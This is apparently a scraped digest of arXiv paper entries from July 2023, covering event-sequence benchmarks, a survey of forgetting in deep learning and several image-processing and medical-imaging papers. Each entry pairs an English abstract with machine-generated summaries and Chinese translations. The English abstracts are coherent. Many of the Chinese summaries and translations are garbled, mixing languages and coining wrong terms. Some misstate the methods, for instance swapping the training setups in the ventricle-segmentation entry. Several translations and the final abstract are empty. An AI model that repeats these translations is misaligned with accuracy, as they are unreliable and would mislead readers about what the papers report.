continuous-time event sequences在真实世界中的应用领域，如医疗、金融、在线购物、社交网络等，扮演着重要的角色。为模型这种数据，时间点过程（TPP）已经成为最先进的生成模型，在学术和应用社区中产生了深见的影响。尽管最近几年出现了许多强大的模型，但是还没有一个通用的标准准则来评估它们。这种标准化的缺失使得研究人员和实践者无法比较方法和重现结果，可能会抑制这个领域的进步。在这篇论文中，我们提出了EasyTPP，它的目标是建立TPP的中心评估标准。与之前的工作相比，EasyTPP有三个独特的贡献：（i）对八种最具影响力的神经网络TPP进行了完整的实现，并集成了通用的评估指标和数据集；（ii）提供了一个标准化的评估管道，使得不同的方法在不同的数据集上进行了公平的比较；（iii）支持多种Machine Learning库（如PyTorch和TensorFlow）以及自定义实现。我们的标准是开源的：所有的数据和实现可以在这个 \href{https://github.com/ant-research/EasyTemporalPointProcess}{\textcolor{blue}{Github repository} 中找到。我们将积极维护这个标准，并欢迎其他研究人员和实践者的贡献。我们的标准将助推可重复性的研究进步，从而加速这个领域的研究进步，并在真实世界中产生更 significative的影响。

A Comprehensive Survey of Forgetting in Deep Learning Beyond Continual Learning

paper_url: http://arxiv.org/abs/2307.09218
repo_url: https://github.com/ennengyang/awesome-forgetting-in-deep-learning
paper_authors: Zhenyi Wang, Enneng Yang, Li Shen, Heng Huang
for: This paper is written to provide a comprehensive survey of forgetting in deep learning, beyond its conventional boundaries, and to explore the potential advantages of forgetting in certain cases, such as privacy-preserving scenarios.
methods: The paper uses a broad range of methods to examine forgetting in various research domains within deep learning, including generative models and federated learning. It also draws upon ideas and approaches from other fields that have dealt with forgetting.
results: The paper presents a nuanced understanding of forgetting as a double-edged sword, highlighting its potential advantages in certain cases, and provides a comprehensive list of papers about forgetting in various research fields. It encourages the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications.Here’s the Chinese translation of the three key points:
for: 这篇论文是为了提供深度学习中忘记的全面检讨，超出传统的 bound，并 explore忘记在特定情况下的优点，如隐私保护场景。
methods: 论文使用了多种方法来检查深度学习中忘记的不同领域，包括生成器模型和联合学习。它还借鉴了其他领域对忘记的经验和方法。
results: 论文提供了忘记作为双刃剑的综合理解，并 highlight了忘记在特定情况下的优点。它还提供了关于忘记的广泛列表，并鼓励开发新的方法来 mitigate、利用或甚至欢迎忘记在实际应用中。

Abstract
Forgetting refers to the loss or deterioration of previously acquired information or knowledge. While the existing surveys on forgetting have primarily focused on continual learning, forgetting is a prevalent phenomenon observed in various other research domains within deep learning. Forgetting manifests in research fields such as generative models due to generator shifts, and federated learning due to heterogeneous data distributions across clients. Addressing forgetting encompasses several challenges, including balancing the retention of old task knowledge with fast learning of new tasks, managing task interference with conflicting goals, and preventing privacy leakage, etc. Moreover, most existing surveys on continual learning implicitly assume that forgetting is always harmful. In contrast, our survey argues that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios. By exploring forgetting in a broader context, we aim to present a more nuanced understanding of this phenomenon and highlight its potential advantages. Through this comprehensive survey, we aspire to uncover potential solutions by drawing upon ideas and approaches from various fields that have dealt with forgetting. By examining forgetting beyond its conventional boundaries, in future work, we hope to encourage the development of novel strategies for mitigating, harnessing, or even embracing forgetting in real applications. A comprehensive list of papers about forgetting in various research fields is available at \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning}.

摘要
忘卷（Forgetting）指的是在学习过程中失去或衰退已经获得的信息或知识。 existing surveys on forgetting 主要集中在持续学习领域，但是忘卷在深度学习中的研究领域中也是非常普遍的现象。忘卷在生成模型中的生成器变化和 federated learning 中的客户端数据分布不同而导致的现象。 Addressing 忘卷涉及到保持过去任务知识的 equilibrio 和快速学习新任务的挑战，以及处理任务干扰和矛盾目标的挑战。此外，现有的持续学习survey implicit assumes that forgetting is always harmful。相反，我们的survey argue that forgetting is a double-edged sword and can be beneficial and desirable in certain cases, such as privacy-preserving scenarios。通过探讨忘卷在更广泛的上下文中，我们希望呈现一种更加细腻的理解，并高亮其潜在的优点。通过这种全面的survey，我们希望探讨可以从不同领域中的想法和方法中练习解决忘卷。在未来的工作中，我们希望通过探讨忘卷的不同方面，激发开发 novel strategies for mitigating, harnessing, or even embracing forgetting in real applications。一个完整的关于忘卷的paper的列表可以在 \url{https://github.com/EnnengYang/Awesome-Forgetting-in-Deep-Learning} 中找到。

2023-07-17

eess.IV

eess.IV - 2023-07-17

Reconstructed Convolution Module Based Look-Up Tables for Efficient Image Super-Resolution

paper_url: http://arxiv.org/abs/2307.08544
repo_url: https://github.com/liuguandu/rc-lut
paper_authors: Guandu Liu, Yukang Ding, Mading Li, Ming Sun, Xing Wen, Bin Wang
for: 提高单个图像超分解（SR）任务的效果
methods: 使用新型的重构卷积（RC）模块，它将通道和空间计算解耦，从而降低LUT大小并保持$n\times n$的辐射场
results: 与state-of-the-art LUT基elineSR方法相比，提出的RCLUT方法可以提高辐射场大小9倍，并在5个流行的benchmark数据集上达到优秀表现，同时可以作为LUT基elineSR方法的替换部件进行改进。

Abstract
Look-up table(LUT)-based methods have shown the great efficacy in single image super-resolution (SR) task. However, previous methods ignore the essential reason of restricted receptive field (RF) size in LUT, which is caused by the interaction of space and channel features in vanilla convolution. They can only increase the RF at the cost of linearly increasing LUT size. To enlarge RF with contained LUT sizes, we propose a novel Reconstructed Convolution(RC) module, which decouples channel-wise and spatial calculation. It can be formulated as $n^2$ 1D LUTs to maintain $n\times n$ receptive field, which is obviously smaller than $n\times n$D LUT formulated before. The LUT generated by our RC module reaches less than 1/10000 storage compared with SR-LUT baseline. The proposed Reconstructed Convolution module based LUT method, termed as RCLUT, can enlarge the RF size by 9 times than the state-of-the-art LUT-based SR method and achieve superior performance on five popular benchmark dataset. Moreover, the efficient and robust RC module can be used as a plugin to improve other LUT-based SR methods. The code is available at https://github.com/liuguandu/RC-LUT.

摘要
look-up 表(LUT)-based 方法在单个图像超解像(SR) 任务中表现出色。然而，先前的方法忽视了 Look-up 表中 restricted 收发Field(RF) 的关键原因，这是因为混合空间和通道特征在 vanilla 核函数中所引起的。他们只能通过线性增加 LUT 大小来增加 RF。为了使 RF 增加而不是 LUT 大小线性增加，我们提议一种新的 Reconstructed Convolution(RC) 模块。这可以表示为 $n^2$ 1D LUT，以维护 $n\times n$ 收发Field。与之前的 $n\times n$D LUT 不同，这明显更小。我们的 RC 模块生成的 LUT 存储量低于 1/10000 比 SR-LUT 基eline。我们提议的 Reconstructed Convolution 模块基于 LUT 方法，称为 RCLUT，可以将 RF 尺寸提高至先前的 9 倍，并在五个流行的 benchmark 数据集上实现出色的性能。此外，我们的有效和可靠 RC 模块可以作为 LUT-based SR 方法的插件来改进其性能。代码可以在 https://github.com/liuguandu/RC-LUT 上获取。

Study of Vision Transformers for Covid-19 Detection from Chest X-rays

paper_url: http://arxiv.org/abs/2307.09402
repo_url: None
paper_authors: Sandeep Angara, Sharath Thirunagaru
for: 这个研究旨在检测 COVID-19 病毒，使用视觉转换器进行检测，以提高检测效率和准确率。
methods: 本研究使用了许多现代的视觉转换器模型，包括 Vision Transformer (ViT)、Swin-transformer、Max vision transformer (MViT) 和 Pyramid Vision transformer (PVT)，通过转移学习IMAGENET 权重来实现高度的检测精度。
results: 实验结果显示，视觉转换器模型在 COVID-19 检测中达到了状态对的性能，即 98.75% 到 99.5% 的准确率，超过了传统方法和卷积神经网络（CNNs）的性能， highlighting the potential of Vision Transformers as a powerful tool for COVID-19 detection.

Abstract
The COVID-19 pandemic has led to a global health crisis, highlighting the need for rapid and accurate virus detection. This research paper examines transfer learning with vision transformers for COVID-19 detection, known for its excellent performance in image recognition tasks. We leverage the capability of Vision Transformers to capture global context and learn complex patterns from chest X-ray images. In this work, we explored the recent state-of-art transformer models to detect Covid-19 using CXR images such as vision transformer (ViT), Swin-transformer, Max vision transformer (MViT), and Pyramid Vision transformer (PVT). Through the utilization of transfer learning with IMAGENET weights, the models achieved an impressive accuracy range of 98.75% to 99.5%. Our experiments demonstrate that Vision Transformers achieve state-of-the-art performance in COVID-19 detection, outperforming traditional methods and even Convolutional Neural Networks (CNNs). The results highlight the potential of Vision Transformers as a powerful tool for COVID-19 detection, with implications for improving the efficiency and accuracy of screening and diagnosis in clinical settings.

摘要
COVID-19 大流行导致全球卫生危机，高亮了快速和准确病毒检测的需求。这篇研究论文研究了通过视力变换器进行 COVID-19 检测，这种技术在图像识别任务中表现出色。我们利用视力变换器捕捉全局上下文和学习复杂的图像模式。在这项工作中，我们探索了最新的转换器模型，包括视力变换器（ViT）、Swin-transformer、Max视力变换器（MViT）和Pyramid视力变换器（PVT），以进行 COVID-19 检测使用 CXR 图像。通过使用转换学习IMAGENET 重量，模型实现了各种准确率范围为 98.75% 到 99.5%。我们的实验表明，视力变换器在 COVID-19 检测中实现了状态艺术表现，超越传统方法和卷积神经网络（CNNs）。结果表明，视力变换器是一种有力的工具，可以提高检测和诊断的效率和准确率。

EGE-UNet: an Efficient Group Enhanced UNet for skin lesion segmentation

paper_url: http://arxiv.org/abs/2307.08473
repo_url: https://github.com/jcruan519/ege-unet
paper_authors: Jiacheng Ruan, Mingye Xie, Jingsheng Gao, Ting Liu, Yuzhuo Fu
for: 这篇论文的目的是提出一个更有效率的医疗图像分类方法，以便应用于移动健康应用程序中。
methods: 这篇论文使用了一种名为Efficient Group Enhanced UNet（EGE-UNet）的方法，它将一种名为Group multi-axis Hadamard Product Attention（GHPA）和一种名为Group Aggregation Bridge（GAB）模组组合在一起，以提高分类精度和减少计算负载。
results: 根据实验结果，EGE-UNet比较 existed 的方法有着更好的分类性能，并且降低了参数和计算负载的比例，具体是494倍和160倍。此外，这是第一个参数数量只有50KB的模型。

Abstract
Transformer and its variants have been widely used for medical image segmentation. However, the large number of parameter and computational load of these models make them unsuitable for mobile health applications. To address this issue, we propose a more efficient approach, the Efficient Group Enhanced UNet (EGE-UNet). We incorporate a Group multi-axis Hadamard Product Attention module (GHPA) and a Group Aggregation Bridge module (GAB) in a lightweight manner. The GHPA groups input features and performs Hadamard Product Attention mechanism (HPA) on different axes to extract pathological information from diverse perspectives. The GAB effectively fuses multi-scale information by grouping low-level features, high-level features, and a mask generated by the decoder at each stage. Comprehensive experiments on the ISIC2017 and ISIC2018 datasets demonstrate that EGE-UNet outperforms existing state-of-the-art methods. In short, compared to the TransFuse, our model achieves superior segmentation performance while reducing parameter and computation costs by 494x and 160x, respectively. Moreover, to our best knowledge, this is the first model with a parameter count limited to just 50KB. Our code is available at https://github.com/JCruan519/EGE-UNet.

摘要
“transformer和其 variants 在医疗影像 segmentation 方面广泛应用。然而，这些模型的参数数量和计算负担使得它们不适合移动医疗应用。为解决这个问题，我们提出了一种更高效的方法，efficient Group Enhanced UNet (EGE-UNet)。我们在轻量级的情况下嵌入了Group multi-axis Hadamard Product Attention module (GHPA)和Group Aggregation Bridge module (GAB)。GHPA 将输入特征分组并在不同轴上执行 Hadamard Product Attention 机制 (HPA)，以提取多个视角下的疾病信息。GAB 有效地将多尺度信息 fusion，通过分组低级特征、高级特征和解码器在每个阶段生成的掩码。经过了 ISIC2017 和 ISIC2018 数据集的广泛实验，我们的 EGE-UNet 超越了现有的状态态-of-the-art 方法。总之，相比于 TransFuse，我们的模型实现了更高效的 segmentation 性能，同时减少参数数量和计算成本，减少了 494 倍和 160 倍。此外，我们知道的是，这是第一个参数数量限制在 50KB 的模型。我们的代码可以在上找到。”

Domain Adaptation using Silver Standard Masks for Lateral Ventricle Segmentation in FLAIR MRI

paper_url: http://arxiv.org/abs/2307.08456
repo_url: None
paper_authors: Owen Crystal, Pejman J. Maralani, Sandra Black, Alan R. Moody, April Khademi
for: 这个研究旨在提出一种基于转移学习的左 Lateral ventricular volume (LVV) 分割方法，用于 Fluid-attenuated inversion recovery (FLAIR) MRI 图像。
methods: 这种方法使用了域 adaptation 技术，以便在目标领域中优化性能，并使用了一种新的传统图像处理 algorithm 生成了Silver standard (SS) mask。
results: 测试结果表明，使用 SS+GS 模型（在目标 SS Mask 和源 GS Mask 上进行练习和微调）在三个目标领域上得到了最好的和最稳定的性能（mean DSC = 0.89，CoV = 0.05），并与源 GS 模型在三个目标领域上显著 differently (p < 0.05)。这些结果表明，在目标领域中生成的噪声标签可以帮助模型适应到 dataset-specific 特征，并提供了一个 robust 的参数初始化。

Abstract
Lateral ventricular volume (LVV) is an important biomarker for clinical investigation. We present the first transfer learning-based LVV segmentation method for fluid-attenuated inversion recovery (FLAIR) MRI. To mitigate covariate shifts between source and target domains, this work proposes an domain adaptation method that optimizes performance on three target datasets. Silver standard (SS) masks were generated from the target domain using a novel conventional image processing ventricular segmentation algorithm and used to supplement the gold standard (GS) data from the source domain, Canadian Atherosclerosis Imaging Network (CAIN). Four models were tested on held-out test sets from four datasets: 1) SS+GS: trained on target SS masks and fine-tuned on source GS masks, 2) GS+SS: trained on source GS masks and fine-tuned on target SS masks, 3) trained on source GS (GS CAIN Only) and 4) trained on target SS masks (SS Only). The SS+GS model had the best and most consistent performance (mean DSC = 0.89, CoV = 0.05) and showed significantly (p < 0.05) higher DSC compared to the GS-only model on three target domains. Results suggest pre-training with noisy labels from the target domain allows the model to adapt to the dataset-specific characteristics and provides robust parameter initialization while fine-tuning with GS masks allows the model to learn detailed features. This method has wide application to other medical imaging problems where labeled data is scarce, and can be used as a per-dataset calibration method to accelerate wide-scale adoption.

摘要
lateral ventricular volume (LVV) 是一个重要的临床探索指标。本研究提出了首个将 Transfer Learning 应用于 fluid-attenuated inversion recovery (FLAIR) MRI 的 LVV 分割方法。为了减少对于源和目标领域之间的差异，本研究提出了一种领域适应方法，将目标领域中的 silver standard (SS) 标签转换为 gold standard (GS) 标签，并将其用于补充来自源领域的 GS 标签。本研究测试了四种模型，包括：1) SS+GS：使用目标领域中的 SS 标签进行 fine-tuning，并使用源领域中的 GS 标签进行训练；2) GS+SS：使用源领域中的 GS 标签进行 fine-tuning，并使用目标领域中的 SS 标签进行训练；3) 使用源领域中的 GS 标签进行训练（GS CAIN Only）；4) 使用目标领域中的 SS 标签进行训练（SS Only）。结果显示 SS+GS 模型的表现最佳和最稳定（平均 DSC = 0.89，CoV = 0.05），并与三个目标领域中的 GS-only 模型相比有 statistically significant 的差异（p < 0.05）。结果显示在目标领域中使用不精确的标签进行预训练可以让模型适应到dataset-specific的特性，并提供了Robust的初始化，而在 fine-tuning 过程中使用 GS 标签可以让模型学习到详细的特征。这种方法可以延伸到其他医学影像问题， где 标签是稀缺的，并且可以作为一种可靠的准备方法，帮助快速普遍推广。

Dynamic Snake Convolution based on Topological Geometric Constraints for Tubular Structure Segmentation

paper_url: http://arxiv.org/abs/2307.08388
repo_url: https://github.com/yaoleiqi/dscnet
paper_authors: Yaolei Qi, Yuting He, Xiaoming Qi, Yuan Zhang, Guanyu Yang
for: 提高 tubular 结构分割的准确性和效率，在各种领域 Ensure accuracy and efficiency in various fields.
methods: 使用动态蛇 convolution 精确捕捉 tubular 结构特征，并在多视图Feature fusion中补充注意力。 Propose a multi-view feature fusion strategy to complement attention to features from multiple perspectives during feature fusion.
results: 对 2D 和 3D 数据集进行实验，与其他方法比较，DSCNet 在 tubular 结构分割任务中提供更高的准确性和连续性。 Our experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods.

Abstract
Accurate segmentation of topological tubular structures, such as blood vessels and roads, is crucial in various fields, ensuring accuracy and efficiency in downstream tasks. However, many factors complicate the task, including thin local structures and variable global morphologies. In this work, we note the specificity of tubular structures and use this knowledge to guide our DSCNet to simultaneously enhance perception in three stages: feature extraction, feature fusion, and loss constraint. First, we propose a dynamic snake convolution to accurately capture the features of tubular structures by adaptively focusing on slender and tortuous local structures. Subsequently, we propose a multi-view feature fusion strategy to complement the attention to features from multiple perspectives during feature fusion, ensuring the retention of important information from different global morphologies. Finally, a continuity constraint loss function, based on persistent homology, is proposed to constrain the topological continuity of the segmentation better. Experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods. Our codes will be publicly available.

摘要
精准分割 topological tubular 结构，如血管和道路，在各个领域是关键，以确保准确性和效率。然而，许多因素使得这个任务变得复杂，包括细小的地方结构和变化的全球形态。在这种情况下，我们注意到 tubular 结构的特殊性，并使用这些知识来引导我们的 DSCNet 在三个阶段中同时提高听见：特征提取、特征融合和损失约束。首先，我们提出了动态蛇 convolution，以准确地捕捉 tubular 结构的特征，并在细小和折衔的地方结构中进行适应性地调整。然后，我们提出了多视图特征融合策略，在特征融合时，从多个角度来补充对特征的注意力，以确保保留不同全球形态中的重要信息。最后，我们提出了基于 persistente homology 的连续性约束损失函数，以更好地限制分割结果的topological连续性。在 2D 和 3D 数据集上进行了实验，发现我们的 DSCNet 在 tubular 结构分割任务上提供了更高的准确性和连续性，比较多种方法。我们的代码将在公共可用。

Component-wise Power Estimation of Electrical Devices Using Thermal Imaging

paper_url: http://arxiv.org/abs/2307.08354
repo_url: None
paper_authors: Christian Herglotz, Simon Grosche, Akarsh Bharadwaj, André Kaup
for: 这 paper 用于估计电子板子上不同活动组件的功率消耗。
methods: 该方法使用热成像技术，不需要特殊的高反射层。可以通过手动标注、物体检测方法或利用布局信息获得热图分割。
results: 评估结果显示，使用低分辨率消耗功率大于300mW的consumer infrared镜头，可以达到mean estimation error为10%。

Abstract
This paper presents a novel method to estimate the power consumption of distinct active components on an electronic carrier board by using thermal imaging. The components and the board can be made of heterogeneous material such as plastic, coated microchips, and metal bonds or wires, where a special coating for high emissivity is not required. The thermal images are recorded when the components on the board are dissipating power. In order to enable reliable estimates, a segmentation of the thermal image must be available that can be obtained by manual labeling, object detection methods, or exploiting layout information. Evaluations show that with low-resolution consumer infrared cameras and dissipated powers larger than 300mW, mean estimation errors of 10% can be achieved.

摘要
这篇论文提出了一种新的方法，用温存像来估算电子承载板上不同活动部件的能量消耗。这些部件和板可以由不同材料组成，如塑料、覆监微型逻辑器和金属带或电缆，而不需要特殊的高温透明层。温存像记录在部件上散热时，并进行了可靠的分割，可以通过手动标注、物体检测方法或利用布局信息来获得。评估结果显示，使用低分辨率消耗电频相机和大于300mW的散热功率，可以实现平均估算误差10%。

Neural Modulation Fields for Conditional Cone Beam Neural Tomography

paper_url: http://arxiv.org/abs/2307.08351
repo_url: https://github.com/samuelepapa/cond-cbnt
paper_authors: Samuele Papa, David M. Knigge, Riccardo Valperga, Nikita Moriakov, Miltos Kofinas, Jan-Jakob Sonke, Efstratios Gavves
for: 提高深度学习方法在 cone beam geometry computed tomography (CBCT) 重建中的精度和效率，使其能够在更复杂的CBCT重建中提供更好的结果。
methods: 基于神经场 (NF) 的方法，通过在输入空间中学习一个连续的神经网络来近似重建的密度。新提议的方法是通过使用每个扫描中的本地修饰来Conditioning Cone Beam Neural Tomography (CondCBNT)，使其能够更好地适应不同扫描数据中的变化。
results: CondCBNT 在不同数量的可用投射下对噪声数据和清晰数据都显示了改进的性能，比如使用单个CondCBNT模型可以在低投射数下达到高精度水平。

Abstract
Conventional Computed Tomography (CT) methods require large numbers of noise-free projections for accurate density reconstructions, limiting their applicability to the more complex class of Cone Beam Geometry CT (CBCT) reconstruction. Recently, deep learning methods have been proposed to overcome these limitations, with methods based on neural fields (NF) showing strong performance, by approximating the reconstructed density through a continuous-in-space coordinate based neural network. Our focus is on improving such methods, however, unlike previous work, which requires training an NF from scratch for each new set of projections, we instead propose to leverage anatomical consistencies over different scans by training a single conditional NF on a dataset of projections. We propose a novel conditioning method where local modulations are modeled per patient as a field over the input domain through a Neural Modulation Field (NMF). The resulting Conditional Cone Beam Neural Tomography (CondCBNT) shows improved performance for both high and low numbers of available projections on noise-free and noisy data.

摘要

Efficient coding of 360° videos exploiting inactive regions in projection formats

paper_url: http://arxiv.org/abs/2307.08344
repo_url: None
paper_authors: Christian Herglotz, Mohammadreza Jamali, Stéphane Coulombe, Carlos Vazquez, Ahmad Vakili
for: 提高360度视频编码效率，即使在无法观看的区域忽略 pixels 值。
methods: 利用无效区域忽略 pixels 值，在重建Equirectangular格式或视口中减少损失。
results: 可以达到10%的比特率减少。

Abstract
This paper presents an efficient method for encoding common projection formats in 360$^\circ$ video coding, in which we exploit inactive regions. These regions are ignored in the reconstruction of the equirectangular format or the viewport in virtual reality applications. As the content of these pixels is irrelevant, we neglect the corresponding pixel values in ratedistortion optimization, residual transformation, as well as inloop filtering and achieve bitrate savings of up to 10%.

摘要

Power Modeling for Virtual Reality Video Playback Applications

paper_url: http://arxiv.org/abs/2307.08338
repo_url: None
paper_authors: Christian Herglotz, Stéphane Coulombe, Ahmad Vakili, André Kaup
for: 评估和模型现代虚拟现实播放和流式应用程序在智能手机上的能 consumption。
methods: 通过进行功率测量，进一步构建一个用于估算真实能 consumption的模型，并且可以在关键电池水平下保存能源。
results: 结果显示，降低输入视频分辨率可以减少能 consumption。

Abstract
This paper proposes a method to evaluate and model the power consumption of modern virtual reality playback and streaming applications on smartphones. Due to the high computational complexity of the virtual reality processing toolchain, the corresponding power consumption is very high, which reduces operating times of battery-powered devices. To tackle this problem, we analyze the power consumption in detail by performing power measurements. Furthermore, we construct a model to estimate the true power consumption with a mean error of less than 3.5%. The model can be used to save power at critical battery levels by changing the streaming video parameters. Particularly, the results show that the power consumption is significantly reduced by decreasing the input video resolution.

摘要
Translated into Simplified Chinese:这篇论文提出了一种方法来评估和模拟现代虚拟现实播放和流媒体应用程序在智能手机上的电力消耗。由于虚拟现实处理排序链的计算复杂性很高，相应的电力消耗很大，导致耗电器上的运行时间受限。为解决这个问题，我们进行了电力测量，并构建了一个估算真实电力消耗的模型，模型的误差低于3.5%。这个模型可以在关键的电池水平下保存能量，通过修改流媒体参数来降低输入视频分辨率。结果表明，降低输入视频分辨率可以减少电力消耗。

Power-Efficient Video Streaming on Mobile Devices Using Optimal Spatial Scaling

paper_url: http://arxiv.org/abs/2307.08337
repo_url: None
paper_authors: Christian Herglotz, André Kaup, Stéphane Coulombe, Ahmad Vakili
for: 这个论文是为了实现功能强大的无线视频流媒体，以提高移动设备上的视频播放效率和能效性。
methods: 该论文使用了一种基于文献中的电源模型和主观质量评估指标，来 derive最佳的空间缩放和比特率控制参数。
results: 研究发现，可以通过调整输入视频的分辨率，以优化质量-能效性的交易。对于高清序列，可以保持10%的电源储备，而无损质量损失，或者保持15%的电源储备，而tolerable distortion。测试结果表明，该方法在Wi-Fi和移动网络中具有普遍适用性。

Abstract
This paper derives optimal spatial scaling and rate control parameters for power-efficient wireless video streaming on portable devices. A video streaming application is studied, which receives a high-resolution and high-quality video stream from a remote server and displays the content to the end-user.We show that the resolution of the input video can be adjusted such that the quality-power trade-off is optimized. Making use of a power model from the literature and subjective quality evaluation using a perceptual metric, we derive optimal combinations of the scaling factor and the rate-control parameter for encoding. For HD sequences, up to 10% of power can be saved at negligible quality losses and up to 15% of power can be saved at tolerable distortions. To show general validity, the method was tested for Wi-Fi and a mobile network as well as for two different smartphones.

摘要
这篇论文研究了对移动设备进行功能强化的无线视频流式传输中的空间缩放和速率控制参数优化。一个视频流应用程序被研究，它从远程服务器接收高分辨率和高质量视频流，并将内容显示给终端用户。我们表明，可以根据输入视频的分辨率进行调整，以优化质量-功耗交易。使用文献中提供的电力模型和主观质量评价使用一种感知指标，我们得出了最佳的缩放因子和编码参数的组合。对高清序列，可以在不影响质量的情况下将电力减少10%，或者在可接受的损害下减少15%。为证明普适性，方法在Wi-Fi和移动网络以及两种不同的智能手机上进行了测试。

Combiner and HyperCombiner Networks: Rules to Combine Multimodality MR Images for Prostate Cancer Localisation

paper_url: http://arxiv.org/abs/2307.08279
repo_url: None
paper_authors: Wen Yan, Bernard Chiu, Ziyi Shen, Qianye Yang, Tom Syer, Zhe Min, Shonit Punwani, Mark Emberton, David Atkinson, Dean C. Barratt, Yipeng Hu
For: This paper aims to demonstrate the feasibility of using low-dimensional parametric models to model decision rules for radiologists’ reading of multiparametric prostate MR scans, and to improve the efficiency of automated radiologist labeling.* Methods: The proposed Combiner networks use a linear mixture model or a nonlinear stacking model to model PI-RADS decision rules, and train a single image segmentation network that can be conditioned on these hyperparameters during inference.* Results: Experimental results based on data from 850 patients show that the proposed combiner networks outperform other commonly-adopted end-to-end networks, and provide added advantages in obtaining and interpreting the modality combining rules. The paper also presents three clinical applications for prostate cancer segmentation, including modality availability assessment, importance quantification, and rule discovery.

Abstract
One of the distinct characteristics in radiologists' reading of multiparametric prostate MR scans, using reporting systems such as PI-RADS v2.1, is to score individual types of MR modalities, T2-weighted, diffusion-weighted, and dynamic contrast-enhanced, and then combine these image-modality-specific scores using standardised decision rules to predict the likelihood of clinically significant cancer. This work aims to demonstrate that it is feasible for low-dimensional parametric models to model such decision rules in the proposed Combiner networks, without compromising the accuracy of predicting radiologic labels: First, it is shown that either a linear mixture model or a nonlinear stacking model is sufficient to model PI-RADS decision rules for localising prostate cancer. Second, parameters of these (generalised) linear models are proposed as hyperparameters, to weigh multiple networks that independently represent individual image modalities in the Combiner network training, as opposed to end-to-end modality ensemble. A HyperCombiner network is developed to train a single image segmentation network that can be conditioned on these hyperparameters during inference, for much improved efficiency. Experimental results based on data from 850 patients, for the application of automating radiologist labelling multi-parametric MR, compare the proposed combiner networks with other commonly-adopted end-to-end networks. Using the added advantages of obtaining and interpreting the modality combining rules, in terms of the linear weights or odds-ratios on individual image modalities, three clinical applications are presented for prostate cancer segmentation, including modality availability assessment, importance quantification and rule discovery.

摘要
一个 radiologists 在多 Parametric prostate MR 图像读取中的特征是将不同类型的 MR 模式分别评分，使用 PI-RADS v2.1 报告系统，并将这些图像模式特定的分数相互结合使用标准化的决策规则预测肉眼标签的可能性。本研究旨在证明可以使用低维度parametric模型来模型这些决策规则，无需妥协精度预测肉眼标签。首先，研究表明，线性混合模型或非线性堆叠模型都可以模型PI-RADS决策规则，用于本地化肉眼悬液肿瘤。其次，通过将这些（通用）线性模型的参数作为 гипер参数，可以将多个独立表示不同图像模式的网络在Combiner网络训练中进行权重调整，而不是END-TO-END模式ensemble。在这个HyperCombiner网络中，可以在推理时通过conditioning来控制这些参数，以提高效率。实验结果基于850名患者的数据，对于自动化肉眼标注多参量MR的应用，与其他常见的END-TO-END网络进行比较。通过获得和解释这些组合规则，即图像模式特定的线性权重或抽象比率，可以对肉眼标注进行多种优化和应用。例如，可以根据图像模式的可用性进行评估，或者根据图像模式的重要性进行量化，还可以通过发现新的规则来进行肉眼标注。

Liver Tumor Screening and Diagnosis in CT with Pixel-Lesion-Patient Network

paper_url: http://arxiv.org/abs/2307.08268
repo_url: None
paper_authors: Ke Yan, Xiaoli Yin, Yingda Xia, Fakai Wang, Shu Wang, Yuan Gao, Jiawen Yao, Chunli Li, Xiaoyu Bai, Jingren Zhou, Ling Zhang, Le Lu, Yu Shi
for: liver tumor segmentation and classification
methods: 使用mask transformer进行同时分割和类别 each lesion,以及image-wise classifier来Integrate global信息
results: 在非对照CT预处理任务中，PLAN achieved 95%和96%的患者级敏感性和特异性; 在对照CT任务中，我们的肿体分割精度、回卷率和类别精度分别达92%, 89%和86%,超过了广泛使用的CNN和transformers для肿体分割; 我们还对250个例进行了读者研究, PLAN的结果与一名高级人类放射学家一样，表明我们的结果具有临床意义。

Abstract
Liver tumor segmentation and classification are important tasks in computer aided diagnosis. We aim to address three problems: liver tumor screening and preliminary diagnosis in non-contrast computed tomography (CT), and differential diagnosis in dynamic contrast-enhanced CT. A novel framework named Pixel-Lesion-pAtient Network (PLAN) is proposed. It uses a mask transformer to jointly segment and classify each lesion with improved anchor queries and a foreground-enhanced sampling loss. It also has an image-wise classifier to effectively aggregate global information and predict patient-level diagnosis. A large-scale multi-phase dataset is collected containing 939 tumor patients and 810 normal subjects. 4010 tumor instances of eight types are extensively annotated. On the non-contrast tumor screening task, PLAN achieves 95% and 96% in patient-level sensitivity and specificity. On contrast-enhanced CT, our lesion-level detection precision, recall, and classification accuracy are 92%, 89%, and 86%, outperforming widely used CNN and transformers for lesion segmentation. We also conduct a reader study on a holdout set of 250 cases. PLAN is on par with a senior human radiologist, showing the clinical significance of our results.

摘要
liver tumor分割和分类是计算机辅助诊断中的重要任务。我们想要解决三个问题：liver tumor在非对照计算机 Tomography（CT）中的检测和初步诊断，以及在动态对照CT中的分化诊断。我们提出了一个名为Pixel-Lesion-pAtient Network（PLAN）的框架。它使用一个面Mask transformer来同时分割和分类每个肿瘤，并使用改进的锚点查询和前景增强抽象损失来提高分割精度。它还有一个图像级别分类器，以有效地汇集全像信息并预测patient级诊断。我们收集了一个大规模多阶段数据集，包括939个肿瘤病人和810个正常Subject。4010个肿瘤实例中有八种类型进行了广泛的注释。在非对照肿瘤检测任务上，PLAN达到了95%和96%的patient级敏感性和特异性。在对照CT任务上，我们的肿瘤分割精度、检测精度和分类精度分别为92%, 89%和86%，超过了广泛使用的CNN和transformers для肿瘤分割。我们还进行了一个读者研究，其中PLAN与一名 senior human radiologist相当，表明了我们的结果的临床意义。

Extreme Image Compression using Fine-tuned VQGAN Models

paper_url: http://arxiv.org/abs/2307.08265
repo_url: None
paper_authors: Qi Mao, Tinghan Yang, Yinuo Zhang, Shuyin Pan, Meng Wang, Shiqi Wang, Siwei Ma
for: 提高压缩数据的感知质量，特别是在低比特率下。
methods: 引入生成器模型（VQGAN），使用vector quantization（VQ）将图像表示为矢量编码。
results: 在EXTREMELY低比特率下（<0.1 bpp），提高图像压缩后的感知质量，并且超过了现有的代码库。

Abstract
